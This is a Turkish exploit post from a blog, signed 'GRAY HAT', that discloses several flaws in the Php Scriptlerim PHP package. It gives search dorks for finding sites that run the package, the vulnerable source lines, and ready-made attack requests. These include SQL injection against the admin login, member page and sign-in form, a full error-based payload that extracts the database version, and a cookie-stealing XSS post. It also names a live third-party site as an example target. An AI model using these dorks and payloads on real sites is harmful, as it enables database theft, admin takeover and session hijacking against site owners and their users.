21 Kasım 2014 Cuma
» » » » » » » » » » Powered by Php Scriptlerim Multi Vulnerability

on
No Comment



Powered by Php Scriptlerim Multi Vulnerability
Test : Kali Linux /Linux
Autor : GRAY HAT 
Dorks :  "Powered By : Php Scriptlerim"     "İletişim : info@phpscriptlerim.com"  (TR )
1.

SQL İNJ :  yonetim/index.php  
Panel Code : ($query = mysql_query("SELECT * FROM administrator WHERE username='$username'"); 

EXP : http://localhost/phpscriptlerim/yonetim/index.php

Post Code : username=admin( SQL İNJ BURAYA )&password=admin&gonder=Giri%C5%9F+Yap
2.
SQL Inj :  uyedetay.php


Üye Code : mysql_query("select * from uyeler where sefurl='$url'"); $url = $_GET['url'];
EXP : http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL( SQL İNJ BURAYA )

http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL%27%20AND%20%28SELECT%203581%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28version%28%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Hvkg%27=%27Hvkg
XSS :  uyebilgileri.php

if(isset($_POST['gonder'])){

    

    $text = $_POST['text'];

    $text1 = $_POST['text1']; 

    $password = $_POST['password'];

    $parola = md5($password);

    

 if($text==""||$text1==""){ echo '<font color="red"><b>Alanları boş geçemezsiniz.</b></font><br><br>'; }

 <li class="clearfix"> 

                        <label>İkinci İsim</label> 

                        <input type='text' name='text' value="<?php echo $bbb['text']; ?>" id='name' maxlength="55" />

                        <div class="clear"></div>


EXP : http://localhost/phpscriptlerim/uyebilgileri.php

XSS post :  text=1"><script>alert(document.cookie)</script>&password=&text1=1"><h3>hh</h3>&gonder=Kaydet

SQL Inj : signin.php

if(isset($_POST['gonder'])){



$email = $_POST['email'];

$sifre = $_POST['sifre'];

$tarih = date('Y-m-d');

$parola = md5($sifre);



if($email==""||$sifre==""){ echo '<font color="red"><b>Bütün alanları doldurmanız gerekmektedir.</b></font><br><br>'; }else{



$xlb = mysql_query("SELECT * FROM uyeler WHERE email='$email'")


EXP : http://localhost/phpscriptlerim/signin.php

SQL Post :  email=theethical@facebook.com(SQL İNJ BURAYA )&sifre=1111&security=a4f29&gonder=Giri%C5%9F

Yonetim Panel : http://localhost/phpscriptlerim/yonetim/index.php
Örnek Site : http://mega-park.com.tr/urundetay.php?url=ev-tekstili
https://www.facebook.com/theethical
https://www.facebook.com/pages/Ethical-Cyber-Army-Agent/882502501778493?fref=ts
https://www.facebook.com/pages/Exploit-Vulnerability/672297779527405?fref=ts









Gönderen



































Share: